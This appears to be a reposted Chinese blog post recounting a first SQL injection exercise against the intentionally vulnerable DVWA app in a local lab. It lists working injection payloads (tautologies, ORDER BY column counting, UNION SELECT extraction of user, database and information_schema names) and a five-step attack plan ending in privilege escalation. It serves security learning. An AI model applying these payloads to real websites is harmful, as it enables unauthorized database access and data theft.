2. 程式人生 > >web安全與防禦---2.DVWA之SQL注入

web安全與防禦---2.DVWA之SQL注入

阿新 發佈:2019-02-15

首先登入DVWA主頁:

1、修改安全級別為LOW級(第一次玩別打臉),如圖中DVWA Security頁面中。

2、進入SQL Injection頁面,出錯了。(心裡想著這DVWA是官網下的不至於玩不了吧。。)

網頁錯誤提示:Parse error: syntax error, unexpected '['in C:\xampp\htdocs\DVWA\vulnerabilities\sqli\index.php on line 65

趕緊開啟index.php檔案,這提示報錯65行看看PHP程式碼!(內心是不願意的,我是學java的)

$num = mysqli_fetch_row( $result )[0];

---->猜測放回型別不是陣列,就將[0]去掉試了一下就可以了=。=(留給PHP的朋友去看具體吧,在下先用著)

3、一次奇葩的經歷後開始嘗試第一次的SQL注入。

根據上面的提示,輸入使用者的id,它將返回了關於這個user的資訊。這裡先輸入了“1”試試。

成功返回資料發現瀏覽器的位址列url成

http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# 

換個輸入值2又變成:

http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit# 

輸入單引號‘嘗試,發現頁面報錯:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

由於使用者輸入的值為ID,因此我們習慣判斷這裡的注入型別為數字型,因此嘗試輸入:1 or 1=1 ,看能否查詢:

並且位址列為http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=1+or+1%3D1&Submit=Submit#

所以猜測後臺程式將此值當做字元型,於是輸入:1'or'1'='1,結果成功返回多行資料:(好激動的說)

OWASP測試指南上(http://www.owasp.org.cn/owasp-project/download/OWASP_testing_guide)看還有

Union查詢SQL注入、盲SQl注入、SUBSTRING(text,start,length)、預程式注入。

接下來分析欄位數:有兩種方法

方法一:用order bynum語句。
分析欄位數的原因是我們之後需要用union select語句來獲得我們需要的敏感資料。根據order by知識知道,

要是後面跟著的數字超出了欄位數時,就會報錯!通過這個我們可以確定欄位數。

(使用“#”符號來註釋後面的單引號)

1' order by 2#-------正常
1' order by 3#-------出錯Unknown column '3' in 'order clause',所以欄位數為2

方法二:直接用union select來猜測欄位數。
因為當欄位數不對應的時候,它也是會發生報錯的!
1' union select 1#-------出錯The used SELECT statements have a different number of columns
1' union select 1,2#-------正常,所以欄位數為2

使用Union all結合利用user(),及database(),version()等三個內建函式。得到連線資料庫賬戶資訊、資料庫名稱、資料庫版本資訊。

1' and 1=2 union select user(),database()#------成功得到資料庫資訊!!!

使用Union all結合利用mysql預設的資料庫infromation_scehma,該資料庫儲存了Mysql所有資料庫和表的資訊。

1' and 1=2 union select 1,schema_name from information_schema.schemata#---------(可怕~)

總結一下今天SQL注入的第一次體驗:大致思路如下

1、尋找注入點,應該可以通過web掃描工具實現。


2、通過注入點,嘗試獲得關於連線資料庫使用者名稱、資料庫名稱、連線資料庫使用者許可權、作業系統資訊、資料庫版本等相關資訊。

3、猜解關鍵資料庫表及其重要欄位與內容(常見如存放管理員賬戶的表名、欄位名等資訊)

4、可以通過獲得的使用者資訊,尋找後臺登入入口。

5、利用後臺瞭解進一步資訊,提權,直到拿到伺服器許可權。

相關推薦

web安全防禦---2.DVWASQL注入

首先登入DVWA主頁: 1、修改安全級別為LOW級(第一次玩別打臉),如圖中DVWA Security頁面中。 2、進入SQL Injection頁面,出錯了。(心裡想著這DVWA是官網下的不至於玩

Web安全防禦】簡析Sql注入防禦措施

個人資訊 就職: 聚項資訊科技有限公司 職位:中級Java開發工程師 負責:上汽系統開發與維護 院校:河南理工大學 專業:軟體工程12級 郵箱:[email protected] Q Q :10101000101001010111 1101111010

web安全防禦

一、釣魚網站之XSS攻擊原理分析 將表單提交的指令碼:<script>for(var i=0;i<3;i++){alert("彈死你"+i);}</script> 中的特殊字元進行轉義,禁止指令碼執行。 pom.xml引入common-lang包 <

Web安全防禦措施

服務攻擊:針對程式漏洞進行攻擊常見的有: SQL注入攻擊檔案上傳攻擊XSS跨站指令碼攻擊CSRF(Cross-site request forgery)跨站請求偽造程式邏輯漏洞暴力攻擊:如DDOS,窮舉密碼等C段攻擊 某臺伺服器被攻陷後通過內網進行ARP、DNS等內網攻擊社

Web安全SQL注入攻擊技巧防範

在Web1.0時代,人們更多是關注伺服器端動態指令碼語言的安全問題,比如將一個可執行指令碼(俗稱Webshell)通過指令碼語言的漏洞上傳到伺服器上,從而獲得伺服器許可權。在Web發展初期,隨著動態指令碼語言的發展和普及,以及早期工程師對安全問題認知不足導致很多”安全血案”

web前端安全防禦

大體進行總結了一下相關知識點,如下: 一、XSS:是跨站指令碼攻擊(Cross-Site Scripting)的簡稱。 1、簡介:XSS是指惡意攻擊者利用網站沒有對使用者提交資料進行轉義處理或者過濾不足的缺點,進而新增一些程式碼,嵌入到web頁面中去,使別的使用者訪問都會執行相應的嵌入程式碼

Web安全SQL注入

什麼是SQL注入? sql注入是一種將sql程式碼新增到輸入引數中,傳遞到sql伺服器解析並執行的一種攻擊手法 SQL是怎麼產生的? WEB開發人員無法保證所有的輸入都已經過濾攻擊者利用傳送給SQL伺服器的輸入資料構造可執行的SQL程式碼資料庫未做相應安全配置 如

局域網的安全防禦

dhcp監聽 端口安全 網絡安全 信息安全 楊書凡 提到安全攻擊,往往會想到攻擊來自於互聯網,而內部的局域網安全問題被忽略。在企業局域網中也存在很多安全隱患,本篇博客介紹幾種局域網內部的安全攻擊與防禦常見的局域網攻擊1、MAC地址擴散攻擊 我們知道,交換機在轉發數據幀時,會查

AJAX請求真的不安全麽?談談Web安全AJAX的關系。

ref spl 返回 erer 頁遊 求和 請求 scripting 資料 開篇三問 AJAX請求真的不安全麽? AJAX請求哪裏不安全? 怎麽樣讓AJAX請求更安全? 前言 本文包含的內容較多,包括AJAX,CORS,XSS,CSRF等內容,要完整的看完並理解需要付出

web 安全效能

Apache Apache 案例 Apache : root Apache 子程序 : nobody HTDOCS 目錄 : /var/www /var/www |--include |--image |--temp |--... 很多人會將/var/www使用者與組設定為 nobo

B/S開發框架Web安全問題及防範規範掛馬和WebShell

信息 處理程序 自動運行 code 被攻擊 保存 完全 進程模型 catch Web站點為什麽會遭受攻擊?是為了惡作劇?損害企業名譽?免費瀏覽收費內容?盜竊用戶隱私信息?獲取用戶賬號謀取私利?總之攻擊方式層出不窮,作為B/S開發框架來說,幫助開發者做好解決安

web伺服器檔案伺服器分離磁碟對映

1.磁碟對映 (1)將要被對映的檔案伺服器上存放上傳檔案的資料夾共享 (2)開啟web伺服器計算機中的我的電腦,點選“對映網路驅動器” (3)在彈出的對話方塊中輸入檔案伺服器的

WEB安全基礎-Javascrp相關知識點DOM

JavaScript 問題1:在哪些地方可以執行JavaScript? 1.HTML的<script></script>之間; 如: <script> f

網路安全知識SQL注入

所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令。具體來說,它是利用現有應用程式,將(惡意)的SQL命令注入到後臺資料庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的資料庫,而不

安全攻防SQL注入(通過sqlmap搞定所有問題)

第一步: sqlmap基於Python,所以首先下載: http://yunpan.cn/QiCBLZtGGTa7U  訪問密碼 c26e 第二步: 安裝Python,將sqlmap解壓到Python根目錄下; 第三步: 小試牛刀,檢視sqlmap版本: python sqlmap/sqlmap.py -

安全測試SQL注入攻擊

一、SQL注入攻擊的概念 首先說一下,攻擊者之所以可以利用自己輸入的資料來達到攻擊網站的目的,原因就在於SQL語言作為一種解釋型語言,它的資料其實是由程式設計師編寫的程式碼和使用者提交的資料共同組成的。正是這個原因,攻擊者可以構造對自己有利的資料,利用網站的一

DVWA漏洞測試SQL注入

我們已經在前面討論過sql注入漏洞產生的原因和一些繞過waf的技巧。今天話不多說直接上測試: 首先我們先理清手工注入思路: 1.判斷是否存在注入,注入是字元型還是數字型 2.猜解SQL查詢語句中的欄位數 3.確定顯示的欄位順序 4.獲取當前資料庫 5

DVWA學習SQL注入

DVWA學習之SQL注入 環境工具 dvwa 1.9 phpstudy firefox burpsuite 實驗步驟 一、設定安全級別為LOW 1. 登入DVWA,並將安全級別設定為LOW 2. 進入SQL注入模組,並輸入1,返回結果如下 3. 下面判斷注入型別是字元型注入還是整數型注入 字元型注入的SQ

web安全/滲透測試--24--XXE外部實體注入

1、漏洞描述: XXE Injection即XML External Entity Injection,也就是XML外部實體注入攻擊。漏洞是在對非安全的外部實體資料進行處理時引發的安全問題。 在XML1.0標準裡,XML文件結構裡定義了實體(entity)這

web安全/滲透測試--25--伺服器端包含注入(SSI注入

1、漏洞描述: SSI是英文Server Side Includes的縮寫,翻譯成中文就是伺服器端包含的意思。從技術角度上說,SSI就是在HTML檔案中,可以通過註釋行呼叫的命令或指標。SSI具有強大的功能,只要使用一條簡單的SSI命令就可以實現整個網站的內容